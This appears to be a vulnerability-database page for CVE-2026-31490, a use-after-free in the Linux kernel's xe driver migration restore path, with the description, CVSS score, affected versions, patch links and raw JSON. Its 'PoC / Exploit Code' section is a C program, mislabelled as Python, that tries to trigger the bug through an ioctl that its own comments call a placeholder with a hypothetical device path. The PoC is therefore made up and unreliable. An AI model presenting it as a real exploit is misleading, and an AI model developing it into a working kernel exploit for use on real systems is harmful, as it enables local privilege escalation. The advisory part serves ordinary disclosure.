Security Vulnerability Report
中文
CVE-2026-31490 CVSS 7.8 HIGH

CVE-2026-31490

Published: 2026-04-22 14:16:47
Last Modified: 2026-04-28 12:52:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: drm/xe/pf: Fix use-after-free in migration restore When an error is returned from xe_sriov_pf_migration_restore_produce(), the data pointer is not set to NULL, which can trigger use-after-free in subsequent .write() calls. Set the pointer to NULL upon error to fix the problem. (cherry picked from commit 4f53d8c6d23527d734fe3531d08e15cb170a0819)

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < commit 87997b6c6516e049cbaf2fc6810b213d587a06b1
Linux Kernel < commit e28552b4ddea5cb4725380dd08237831af835124

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-31490 * Triggering use-after-free in xe_sriov_pf_migration_restore_produce */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Hypothetical device path and IOCTL for demonstration #define DEVICE_PATH "/dev/dri/renderD128" #define IOCTL_MIGRATION_RESTORE 0x8000 // Placeholder struct restore_args { unsigned long addr; size_t size; }; int main() { int fd; struct restore_args args; printf("[*] Opening device %s...\n", DEVICE_PATH); fd = open(DEVICE_PATH, O_RDWR); if (fd < 0) { perror("[-] Failed to open device"); return 1; } // Step 1: Trigger the error path in xe_sriov_pf_migration_restore_produce // This causes the internal pointer to be freed but not set to NULL printf("[*] Step 1: Triggering error path (freeing pointer)\n"); args.size = 0xFFFFFFFF; // Invalid size to force error if (ioctl(fd, IOCTL_MIGRATION_RESTORE, &args) != 0) { printf("[+] Error returned as expected (pointer freed)\n"); } // Step 2: Call write again. The driver tries to use the stale pointer. printf("[*] Step 2: Calling write again to trigger UAF\n"); // This loop attempts to trigger the .write() callback write(fd, "TRIGGER", 7); printf("[*] If exploit successful, kernel panic or crash occurs here.\n"); close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31490", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:46.763", "lastModified": "2026-04-28T12:52:29.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/pf: Fix use-after-free in migration restore\n\nWhen an error is returned from xe_sriov_pf_migration_restore_produce(),\nthe data pointer is not set to NULL, which can trigger use-after-free\nin subsequent .write() calls.\nSet the pointer to NULL upon error to fix the problem.\n\n(cherry picked from commit 4f53d8c6d23527d734fe3531d08e15cb170a0819)"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19.1", "versionEndExcluding": "6.19.11", "matchCriteriaId": "5054C854-C253-4020-BD2E-2BDA121E424C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:-:*:*:*:*:*:*", "matchCriteriaId": "35C8A871-4971-433E-A046-FC9F7B7D190A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/87997b6c6516e049cbaf2fc6810b213d587a06b1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e28552b4ddea5cb4725380dd08237831af835124", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.